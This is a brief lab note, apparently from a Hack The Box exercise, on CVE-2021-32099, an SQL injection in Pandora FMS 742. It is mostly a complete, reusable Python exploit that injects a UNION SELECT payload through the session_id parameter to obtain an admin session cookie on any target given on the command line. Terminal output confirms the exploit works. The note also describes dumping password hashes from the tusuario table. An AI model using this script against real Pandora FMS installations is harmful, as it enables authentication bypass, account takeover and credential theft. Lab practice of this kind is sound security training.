InfoSec LAB

Pandora_CVE-2021-32099

Created: 2 min read

CVE-2021-32099

a vulnerability, which was classified as critical, was found in artica pandora fms 742. This affects some unknown processing of the file /include/chart_generator.php of the component pandora_console. The manipulation of the argument session_id with an unknown input leads to a sql injection vulnerability. CWE is classifying the issue as CWE-89. The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This is going to have an impact on confidentiality, integrity, and availability.

Exploit

import requests
import argparse
 
# Set up command line argument parser
parser = argparse.ArgumentParser(description='Send a payload and retrieve a session cookie')
parser.add_argument('-t', '--target', type=str, required=True, help='Host and port to send payload to in <host:port> format')
args = parser.parse_args()
 
# Payload
payload = "pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:\"admin\";' as data FROM tsessions_php WHERE '1'='1"
 
# Build URL with specified target
url = f'http://{args.target}/{payload}'
 
# Send GET request with payload
response = requests.get(url)
 
# Check for successful response
if response.status_code == 200:
    # Retrieve session cookie
    session_cookie = response.cookies.get('PHPSESSID')
    print(f'\nRetrieved session cookie: {session_cookie}')
else:
    print(f'\nError: Failed to retrieve session cookie. Response code {response.status_code}')
 
 
# Check if session cookie is valid admin cookie
cookies = {
    'PHPSESSID': session_cookie
}
 
url = f'http://{args.target}/pandora_console/index.php'
 
response = requests.get(url, cookies=cookies)
 
if 'Pandora FMS Overview' in response.text:
    print('\nSession cookie is VALIDATED')
else:
    print('\nSession cookie is not a valid cookie')

I wrote a simple Python script It bypasses the authentication via SQLi, retrieves the session cookie, and validates it.

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 CVE-2021-32099.py                  
usage: CVE-2021-32099.py [-h] -t TARGET
cve-2021-32099.py: error: the following arguments are required: -t/--target
 
┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 cve-2021-32099.py -t 127.0.0.1:8008
 
retrieved session cookie: 2ucfbsoiltqo3u1tjs7dtojr25
 
Session cookie is VALIDATED

Successfully retrieved the admin session cookie; 2ucfbsoiltqo3u1tjs7dtojr25

Now I just need to send a GET request to the web application with the session cookie

Authenticated.

One of the Admin Tools allow me to execute SQL queries Pandora FMS stores credentials in the tusuario table i got the web credential hashes out:

  • ad3f741b04bd5880fb32b54bc4f43d6a
  • 76323c174bd49ffbbdedf678f6cc89a6
  • f655f807365b6dc602b31ab3d6d43acc

Although hashcat failed to crack any of those hashes, I can do other things from here on out as the instance is extremely obsolete and vulnerable

Interactive Graph View

Backlinks